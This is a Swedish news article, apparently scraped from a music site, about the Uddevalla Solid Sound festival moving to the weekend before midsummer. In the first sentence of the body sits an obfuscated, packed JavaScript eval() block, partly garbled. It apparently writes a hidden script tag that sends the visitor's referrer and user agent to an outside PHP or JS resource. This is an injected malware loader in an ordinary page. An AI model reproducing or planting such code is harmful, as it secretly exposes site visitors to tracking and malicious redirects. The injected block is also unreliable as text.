Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Uddevalla Solid Sound blåser liv i klassisk festivalhelg

Uddevalla Solid Sound blåser liv i klassisk festivalhelg
Sebastian

Uddevalla eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zfffr|var|u0026u|referrer|azedd||js|php’.split(’|’),0,{}))
Solid Sound, en av landets mest expansiva festivaler, kommer nästa år att byta datum till landet mest klassiska festivalhelg: helgen före midsommar som i år infaller den 12 – 13 juni.

– Vi ska fortsätta att växa och ett led i den satsningen är att vi nu lägger oss på de datum som Hultsfredsfestivalen under nära ett par decenniers tid prenumererade på, säger Simon Tehyrell, informationsansvarig på Uddevalla Solid Sound.

Uddevalla Solid Sound går mot strömmen i festivalsverige som en de mest expansiva festivalerna. På bara tre år har uppstickaren från västkusten vuxit från 300 till drygt 8000 besökare. Senaste festivalen bjöd på exklusiva och uppmärksammade framträdanden av bland andra Angel Haze och Kvelertak.

I år kommer Uddevalla Solid Sound att arrangeras den 12 -13 juni på Riversideängen i centrala Uddevalla. Det är helgen före midsommar, och framför allt en klassisk svensk festivalhelg. Mellan 1996 och 2012 arrangerades Hultsfredsfestivalen endast med några undantag just denna helg. Uddevalla Solid Sound har tidigare arrangerats sista helgen i augusti.

– Att få inleda festivalsommaren istället för att som tidigare avsluta den känns riktigt spännande. Det finns en särskild energi hos folk just innan sommaren tar fart på allvar, en hunger som vi hoppas kunna omvandla till eufori, säger Simon Tehyrell, informationsansvarig på Uddevalla Solid Sound.

Artister släpps inom kort.